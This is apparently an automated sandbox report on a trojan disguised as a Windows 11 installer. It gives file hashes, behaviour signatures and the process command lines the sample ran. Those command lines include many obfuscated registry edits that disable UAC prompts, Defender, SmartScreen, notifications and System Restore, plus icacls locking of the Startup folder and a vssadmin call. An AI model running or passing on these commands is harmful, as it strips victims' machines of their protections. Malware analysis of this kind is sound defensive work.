| SHA512 | 0089a7e5e0c3d7b8a226775f30983e901b323846d5263366672390ebbbd9212bd72bdb87c7baeeb09c6438317a66f5ccfc20cd898579190e6bb7579dd1cd158a |
C:\Users\Admin\AppData\Local\Temp\autB1E1.tmp
| MD5 | c87a407a6decc862e3132efc8ab504c9 |
| SHA1 | 20cd713fa491119aabfd25a7cce7a8209098f903 |
| SHA256 | 439de9f662754bbcfc211658ce3f1c1730e85df199ed1e067940e28831d2c758 |
| SHA512 | 8bed0ca582ca5b46f0c6922995343388df0d84d063512308d3f58c31da1811cb2c47b87be0ce5de4a1fb8ce14f89f8f3197f31bb0ca989fa159514f6751e1832 |
C:\Users\Admin\AppData\Local\Temp\autB1F3.tmp
| MD5 | 3886aae8ae30f288363ce4d2ac4f81c2 |
| SHA1 | 19441c886b57ed9f4650f614f0d93501d0a33e40 |
| SHA256 | 37f10f3d46a2886cac6169a398e91dd8cd0cfd06a7b6812e1afb68c4c031b9fd |
| SHA512 | b37aa26a5324723d9b8a7b919c3727565a1e1974ba1316093b59dbe4a75f5e0773288894d7abb403d65688e0e3f29ef4b48af7a8048e64fe36199bf8d371fb31 |
C:\Users\Admin\AppData\Local\Temp\2z7k4c0q.tmp
| MD5 | c857a930b241455b7961a16c96ddf256 |
| SHA1 | 40f6df790dc7bc1e7daa1f48a729453a2ffd9efa |
| SHA256 | b2023c405900d194c0a00ea1cabefa96f3abcb73c2da88c3802594811a128bbc |
| SHA512 | 702b4c9327cddd5d8baac050376143e42ac4632afb0e1b605a0d3a7d448a9f570296981b509f66cab56926a6c52bb8fd90b6014a89d433e3b8f41396b6fe7bcb |
C:\Users\Admin\AppData\Local\Temp\autB1F2.tmp
| MD5 | bdb4dcbcec51d9ee1afee83221921fee |
| SHA1 | 21d56a9334238297d1a09aba46043cc36c9e2d3c |
| SHA256 | 9e5d8505b986e40cce00707180334fead34c0c3b590c458305de89e4bbc85f75 |
| SHA512 | cad20e6355cfe1e42a4ee7f5350a033ec79b8ed2689d8c6fa11bb1c3ae2a99425f03d95312ed9daf5c2543fc7ce38239fca41700cbecbc02a007a669ffd81fa5 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 84e977761b7f9011feb9296566d27a38 |
| SHA1 | 0bdbab50c1401b68f18085e73fa27d2148d38d6a |
| SHA256 | 001e88839eeb5b026cefe2e048d39e581d43d564067caed4a6ff4f147cd8395c |
| SHA512 | 9bd2a7e559567aa951b3e10c496a19f796a0ad879fe91886cd36c169a3efd71fecbad3036c540c4e5f5da17ba090e6b84ec69e5fe22446d0f3563298a7571d03 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | ef39c97b88adcf24f9d75d036a4d0e35 |
| SHA1 | a967da66a057bf2521739b5d61cd07ce1084195a |
| SHA256 | c9466b8bc2571ebd353e84485192d2d9021e6d759c84599145afff73dece5956 |
| SHA512 | 510d404a4f4cdd89d144575ffaae9f48f31d3446a9eea6541b8f95ce2f555fab618a0314f9403ff74898d7d4e35592dc2553774926e9ce8255aceef09679b2f7 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | a348b69e3a366a07e1a1651600151eb3 |
| SHA1 | 49c0212e9088d91c6689cedc1b91fa6b062dcd0e |
| SHA256 | c183869d9a0ed88e0f4edf9624859c653ea0bb458d6c4be2ef798aedd3ddfa79 |
| SHA512 | 2bc5676a297a3e9e1eafb759bc5fefc81fbb019df2e3e2f218bf8f42c65ff6f3592f6a7324c96f7772feb0cdaf896109ec6ead2c77126f4ed8ec98b0f21c7e93 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 92da4ee5615831e9c2ecfa75a8937948 |
| SHA1 | dfe4429943c88b6609de67ebca3452558f26b39e |
| SHA256 | 2459577877c335500b993422f09863098cdc2936ed7383f7865a1c2344718df2 |
| SHA512 | 3df1c1b906bd87c42a23f0724142063c1b8955aef4ab83e7bb13a53d5b228670a92ce9f3c2e6e1c7eda0b2894b2105f85f652f2eda73fb5aba78d7055ee00ca9 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | bb1d44e3eeb99421323697ddf80268f2 |
| SHA1 | 8c0e1fd7a3dd015374445201df2d227c4faae8dc |
| SHA256 | e343989aa40afb2faa32b8c4ef58d9fb7b5ffb5157657034de710c176267e8f0 |
| SHA512 | 1a5cdc98945141238c9883886dc17a76a91af5a28a80aa0d0267eb3a4cd635645446abbe9ecb5364834b8203fcfd89cd490e8a168d858254aa4a79fb94e95694 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 831e07ee008a83e89de16108a17bbf35 |
| SHA1 | ea9abedbaed2d7590fbb369c5ea69a70696faced |
| SHA256 | 92751d33e76419b8f132b44b52d7a5943ede5025528d82dd60c25d0600c1ce86 |
| SHA512 | 86fd31745004cbb587ee05286ab6a82f0560afe6d38372985c484fccc84b53b974aa8459f9bf9edccaa3cc0e62c94f35f6f1619f41df5811e93d7bb62f82ab12 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 09074950970f5172530696cee2d2909f |
| SHA1 | 8eefdc4845a20233750b94894d07558bfe3bddf2 |
| SHA256 | 6e7cbf78872b8d7d40359b13168d2a8eef35b94641788e1014d250e47ed9baab |
| SHA512 | 626554250b64653ec8655a31768b2266b67c0558995831c193f48c3edd8cba2f2b8d2feab721c6dcf994d85bccbfa671e6afec052d43edb37cd3a40717fe4c5b |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 2713185100af50bb19746cb3404913df |
| SHA1 | db6e5c2e34a949a64857b3a05e04d056ca4938c6 |
| SHA256 | a933d949e903e51c5bc3e995972a644c661ac8677ba3a01f8751ec0be6d159cf |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 23:57
Reported
2024-11-15 00:00
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
140s
Command Line
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\Cmd = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\EXE = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\SCr = "0" | C:\Windows\system32\rEG.EXE | N/A |
Deletes shadow copies
Disables use of System Restore points
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk | C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipINFO.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2516 set thread context of 1500 | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp" /SL5="$70050,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp" /SL5="$80050,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\pik.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\pik.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\tmp\.cmd" "
C:\Windows\system32\reg.exe
rEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F
C:\Windows\system32\reg.exe
reg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f
C:\Windows\system32\reg.exe
rEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f
C:\Windows\system32\reg.exe
reg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F
C:\Windows\system32\reg.exe
reG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f
C:\Windows\system32\reg.exe
reG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f
C:\Windows\system32\reg.exe
rEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
reG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F
C:\Windows\system32\reg.exe
reg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
reG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f
C:\Windows\system32\reg.exe
reg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f
C:\Windows\system32\reg.exe
rEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f
C:\Windows\system32\reg.exe
rEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f
C:\Windows\system32\icacls.exe
icaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C
C:\Windows\system32\icacls.exe
iCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c
C:\Windows\system32\vssadmin.exe
